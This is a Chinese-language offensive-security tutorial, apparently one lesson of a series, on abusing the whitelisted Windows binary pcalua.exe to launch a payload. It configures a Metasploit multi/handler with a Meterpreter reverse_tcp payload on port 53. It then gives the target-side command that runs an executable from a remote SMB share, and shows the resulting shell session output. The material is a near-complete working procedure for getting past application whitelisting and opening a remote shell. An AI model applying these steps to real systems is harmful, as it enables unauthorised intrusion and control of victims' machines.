第八十五课:基于白名单Pcalua执行payload第十五季
注:请多喝点热水或者凉白开,可预防肾结石,通风等。 痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。

Pcalua简介:

Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。
说明:Pcalua.exe所在路径已被系统添加PATH环境变量中,因此,Pcalua命令可识别
Windows 7 默认位置:
1
C:\Windows\System32\pcalua.exe
Copied!
攻击机: 192.168.1.4 Debian 靶机: 192.168.1.5 Windows 7

配置攻击机msf:

1
msf exploit(multi/handler) > show options
2
3
Module options (exploit/multi/handler):
4
5
Name Current Setting Required Description
6
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
7
8
Payload options (windows/meterpreter/reverse_tcp):
9
10
Name Current Setting Required Description
11
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
12
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
13
14
LHOST 192.168.1.4 yes The listen address (an interface may be specified)
15
16
LPORT 53 yes The listen port
17
18
Exploit target:
19
20
Id Name
21
‐‐ ‐‐‐‐
22
0 Wildcard Target
23
24
msf exploit(multi/handler) > exploit
25
26
[*] Started reverse TCP handler on 192.168.1.4:53
Copied!

靶机执行:

1
Pcalua -m -a \\192.168.1.119\share\rev_x86_53_exe.exe
Copied!
1
msf exploit(multi/handler) > exploit
2
3
[*] Started reverse TCP handler on 192.168.1.4:53
4
[*] Sending stage (179779 bytes) to 192.168.1.5
5
[*] Meterpreter session 23 opened (192.168.1.4:53 ‐> 192.168.1.5:11349)
6
at 2019‐01‐20 09:25:01 ‐0500
7
meterpreter > getuid
8
Server username: John‐PC\John
9
meterpreter > getpid
10
Current pid: 11236
11
meterpreter >
Copied!
Micropoor
Last modified 2yr ago